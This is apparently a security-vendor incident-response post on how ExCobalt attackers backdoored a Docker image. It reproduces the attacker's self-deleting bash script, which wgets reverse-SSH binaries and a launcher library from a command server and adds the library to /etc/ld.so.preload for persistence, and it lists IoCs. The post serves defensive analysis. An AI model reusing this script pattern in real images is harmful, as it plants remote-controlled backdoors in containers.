[ << ALL_FEED ]

(Ex)Cobalt in container

More in Malware

  • This is Siemens...

    Recently, our colleagues from the Positive Industrial Expertise Center discovered a curious Windows sample on MalwareBazaar.…

  • Anti-antivirus

    Recently, we came across an APK with an intriguing and trust-inspiring name: «Антивирус ФСБ.apk». After installing…

  • .exe .docm .xlsm

    .exe .docm .xlsm Malicious files with these extensions are most often found in corporate network traffic.…

  • Operation Chewbacca

    At the end of June, the PT ESC team, during incident investigations, discovered a new group…

  • Your Zimbra server is at risk

    Recently, our PT ESC IR team encountered a new attack by ransomware groups on Zimbra mail…

(Ex)Cobalt in a Container 🛂

During the response to a computer incident, the PT ESC IR team established the fact that attackers had gained a foothold in Docker containers.

Analyzing a dump from the node where Docker was installed, we found malware samples in the directory /var/lib/docker/overlay2/[a-z0-9]+/diff/usr/bin/.+. This directory contains container layers:

/var/lib/docker/overlay2/[REDACTED]/diff/usr/bin/processes — Reverse SSH
/var/lib/docker/overlay2/[REDACTED]/diff/usr/bin/checks — ExCobalt Reverse SSH

It became clear that we had discovered an infection inside one of the containers. For additional analysis, we obtained the Docker image from which the container was created. Example command:

docker save myimage:latest | gzip > myimage_latest.tar.gz

Analysis of the history showed that the attacker managed to modify the image by executing two commands: COPY, which copied the update file into the image, and a command to run the script /bin/bash /update. The modified image was then uploaded to the local Docker Registry.

{
   "created": "2023-08-11T01:13:12",
   "created_by": "/bin/sh -c #(nop) COPY file:[REDACTED] in / "
},
{
   "created": "2023-08-11T01:13:18",
   "created_by": "/bin/sh -c /bin/bash /update"
}

Next, in one of the image layers, we discovered a self-deleting sh script update:

#!/bin/bash
rm -- $0
apt update
apt install wget curl -y
apt-get clean autoclean
apt-get autoremove --yes
wget -q [REDACTED]:8000/bin/rev_sh_dns -O /usr/bin/checks
wget -q [REDACTED]:8000/bin/rev_ssh -O /usr/bin/processes
wget -q [REDACTED]:8000/lib/libssoc.so.3h -O /usr/lib/x86_64-linux-gnu/libssoc.so
chmod +x /usr/bin/checks /usr/bin/processes /usr/lib/x86_64-linux-gnu/libssoc.so
echo "/usr/lib/x86_64-linux-gnu/libssoc.so" >> /etc/ld.so.preload

The script downloaded malware samples from the command server into the image, and also added them to /etc/ld.so.preload for persistence.

/usr/lib/x86_64-linux-gnu/libssoc.so — an ExCobalt Launcher sample launches the processes /usr/bin/checks and /usr/bin/processes.

🧐 The investigation showed that the attackers modified the Docker image of the containers being created and thus not only gained a foothold in the compromised infrastructure, but also gained control over newly created containers.

To prevent such computer incidents, it is recommended to check the OS, as well as the Docker containers running on devices and the configuration files / scripts involved in the build.

IoCs:

leo.rpm-bin.link
mirror.dpkg-source.info

e49b72e58253f4f58f9c745757eb3ab0
3bd5560b50c751c91056bfe654f9bc70
ef587305a462161682f74d0cad139caa

#ir #ioc #malware
@ptescalator

More from oUth0R

More from oUth0R

More in Malware

  • This is Siemens...

    Recently, our colleagues from the Positive Industrial Expertise Center discovered a curious Windows sample on MalwareBazaar.…

  • Anti-antivirus

    Recently, we came across an APK with an intriguing and trust-inspiring name: «Антивирус ФСБ.apk». After installing…

  • .exe .docm .xlsm

    .exe .docm .xlsm Malicious files with these extensions are most often found in corporate network traffic.…

  • Operation Chewbacca

    At the end of June, the PT ESC team, during incident investigations, discovered a new group…

  • Your Zimbra server is at risk

    Recently, our PT ESC IR team encountered a new attack by ransomware groups on Zimbra mail…